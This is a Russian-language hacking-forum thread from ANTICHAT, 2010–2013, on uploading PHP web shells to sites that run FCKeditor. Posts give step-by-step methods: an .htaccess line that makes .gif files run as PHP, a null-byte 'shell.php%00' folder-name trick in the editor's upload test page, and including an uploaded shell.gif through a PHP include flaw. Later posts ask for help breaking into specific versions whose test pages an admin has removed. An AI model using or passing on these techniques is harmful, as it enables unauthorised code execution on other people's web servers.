HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.05.2010, 19:03
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами: 8638130

Репутация: 54
По умолчанию

можно залить сперва .htaccess со следующим содержанием:
AddHandler application/x-httpd-php .gif

потом шелл shell.gif
 
Ответить с цитированием

  #2  
Старый 19.05.2010, 20:10
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Цитата:
Сообщение от pinch  
можно залить сперва .htaccess со следующим содержанием:
AddHandler application/x-httpd-php .gif

потом шелл shell.gif
.htaccess никак не соотвествует допустимым расширениям, так что не прокатит
 
Ответить с цитированием

  #3  
Старый 19.05.2010, 23:39
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами: 8638130

Репутация: 54
По умолчанию

тогда так... работает в случае magic_quotes_gpc=off
идем:
http://test/fckeditor/editor/filemanager/connectors/uploadtest.html

1. Upload a new file:
Выбираем наш шелл в txt формате
2. Select the "File Uploader" to use:
Выбираем php
3. Resource Type
Оставляем None
4. Current Folder:
Вбиваем shell.php%00
5. И нажимаем Send in to the server

В поле Uploaded File URL: появится путь до нашего загруженного шелла..... в моем случае /userfiles/shell.php

Последний раз редактировалось pinch; 19.05.2010 в 23:41..
 
Ответить с цитированием

  #4  
Старый 26.08.2010, 05:36
Welemir
Познающий
Регистрация: 10.01.2008
Сообщений: 58
С нами: 9650471

Репутация: -2
По умолчанию

В 2.6.5 не сработало : ).Просто залился shell.txt в папку upload
 
Ответить с цитированием

  #5  
Старый 13.04.2011, 14:51
SergioBlog
Новичок
Регистрация: 21.01.2011
Сообщений: 10
С нами: 8056406

Репутация: 0
По умолчанию

Столкнулся тоже с этим FCKeditor, только версия 2.3 Beta.

Проблема в том, что админ удалил все test.html/upload.html файлы =\\

Я качал офф дистр и пытался подобрать пути правильно - не выходит.

Пытался заливать через админку сайта файлы, там при заливке открывается этот FCK и всё через него происходит, так вот он не даёт ничего загрузить - invalid file выдаёт ворнинг и всё =\

.htaccess не даёт залить, %00 в имени файла тоже не работает.
 
Ответить с цитированием

  #6  
Старый 22.10.2011, 01:17
den1skA
Познающий
Регистрация: 20.05.2008
Сообщений: 78
С нами: 9460495

Репутация: 47
По умолчанию

Цитата:
Сообщение от SergioBlog  
Столкнулся тоже с этим FCKeditor, только версия 2.3 Beta.
Проблема в том, что админ удалил все test.html/upload.html файлы =\\
Я качал офф дистр и пытался подобрать пути правильно - не выходит.
Пытался заливать через админку сайта файлы, там при заливке открывается этот FCK и всё через него происходит, так вот он не даёт ничего загрузить - invalid file выдаёт ворнинг и всё =\
.htaccess не даёт залить, %00 в имени файла тоже не работает.
знает кто нибудь решение проблемы?

аналогичная ситуация...
 
Ответить с цитированием

  #7  
Старый 12.07.2012, 15:33
shumaher
Новичок
Регистрация: 16.02.2009
Сообщений: 0
С нами: 9068805

Репутация: 0
По умолчанию

Цитата:
Сообщение от pinch  
тогда так... работает в случае magic_quotes_gpc=
off
идем:
http://test/fckeditor/editor/filemanager/connectors/uploadtest.html
1. Upload a new file:
Выбираем наш шелл в txt формате
2. Select the "File Uploader" to use:
Выбираем php
3. Resource Type
Оставляем None
4. Current Folder:
Вбиваем shell.php%00
5. И нажимаем Send in to the server
В поле Uploaded File URL: появится путь до нашего загруженного шелла..... в моем случае /userfiles/shell.php
Не буду создавать, дабы не мусорить. Ситуация такова: Все описанные здесь способы не работают. Некоторое пофиксили, и саму возможность в конфигах (test, uploadtest html).

Помогите советом, как залить шелл: FCKeditor 2.6.4.1 Build 23187
 
Ответить с цитированием

  #8  
Старый 19.07.2012, 01:03
heJiZzZ
Новичок
Регистрация: 01.06.2009
Сообщений: 7
С нами: 8917779

Репутация: 2
По умолчанию

тут вариант один - залить шелл в любом формате, хоть .gif, потом найти php-инклуд инъекцию и заинклудить наш shell.gif
 
Ответить с цитированием

  #9  
Старый 06.01.2013, 06:26
RaWaS
Новичок
Регистрация: 13.01.2010
Сообщений: 0
С нами: 8592610

Репутация: 0
По умолчанию

Цитата:
Сообщение от heJiZzZ  
тут вариант один - залить шелл в любом формате, хоть .gif, потом найти php-инклуд инъекцию и заинклудить наш shell.gif
а как найти путь куда сохранился файл? в браузере такая хрень:

index.php?command=storage&Command=Thumb&h=dab8ae44 56fca4d72ef542e27b908&thumbw=100

нашел путь куда сохраняет

/documentroot/storage/hash/dab8ae4456fca4d72ef542e27b908

но как проинклудить? открывается как текст при инклуде
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Спам в первом квартале 2009 Serafim Мировые новости. Обсуждения. 2 05.05.2009 03:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.